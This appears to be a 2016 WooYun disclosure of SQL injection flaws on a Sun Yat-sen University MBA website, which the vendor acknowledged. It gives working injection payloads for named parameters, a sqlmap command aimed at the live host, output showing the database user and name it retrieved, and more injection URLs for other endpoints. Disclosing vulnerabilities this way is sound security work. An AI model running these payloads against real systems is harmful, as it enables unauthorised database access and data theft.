当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168685

漏洞标题:中山大学某站SQL注入打包

相关厂商:中山大学

漏洞作者: Yosef

提交时间:2016-01-11 11:59

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

一起打包了,多给点RANK吧。

详细说明:

注入点 http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2
参数1:first_char
参数2:job_title


Parameter: first_char (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: first_char=W&first_char=L' AND 5694=5694 AND 'AvDK'='AvDK&job_title=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: first_char=W&first_char=L' AND (SELECT 4453 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(4453=4453,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'epXZ'='epXZ&job_title=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: first_char=W&first_char=L' AND (SELECT * FROM (SELECT(SLEEP(5)))dkdz) AND 'EeHe'='EeHe&job_title=2
Parameter: job_title (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: first_char=W&first_char=L&job_title=2 AND 1165=1165
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: first_char=W&first_char=L&job_title=2 AND (SELECT 6652 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(6652=6652,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: first_char=W&first_char=L&job_title=2 AND (SELECT * FROM (SELECT(SLEEP(5)))lvuL)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: first_char, type: Single quoted string (default)
[1] place: GET, parameter: job_title, type: Unescaped numeric
[q] Quit
> 0
[16:00:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0
[16:00:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 346 times
[16:00:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/mba.bus.sysu.edu.cn'
[*] shutting down at 16:00:48


sqlmap -u "http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2" -p job_title --current-db --current-user

[16:07:04] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0
[16:07:04] [INFO] fetching current user
[16:07:04] [WARNING] reflective value(s) found and filtering out
[16:07:04] [INFO] retrieved: zsgy@localhost
current user: 'zsgy@localhost'
[16:07:04] [INFO] fetching current database
[16:07:04] [INFO] retrieved: zsbm
current database: 'zsbm'


漏洞证明:

http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&sdept=8 
http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=L&job_title=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&sdept=8
http://mba.bus.sysu.edu.cn/site/getmore?page=2&page=%5c
index/get_email?email=sample@email.tst&email='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(113)%2cCHAR(81)%2cCHAR(81)%2cCHAR(113)%2cCHAR(106)%2cCHAR(102)%2cCHAR(57)%2cCHAR(122))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'


然后用WVS扫了一下,这里面的全是SQL注入

1.png


随便跑一个

2.png

修复方案:

过滤

版权声明:转载请注明来源 Yosef@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-11 15:38

厂商回复:

谢谢,我们立即处理。

最新状态:

暂无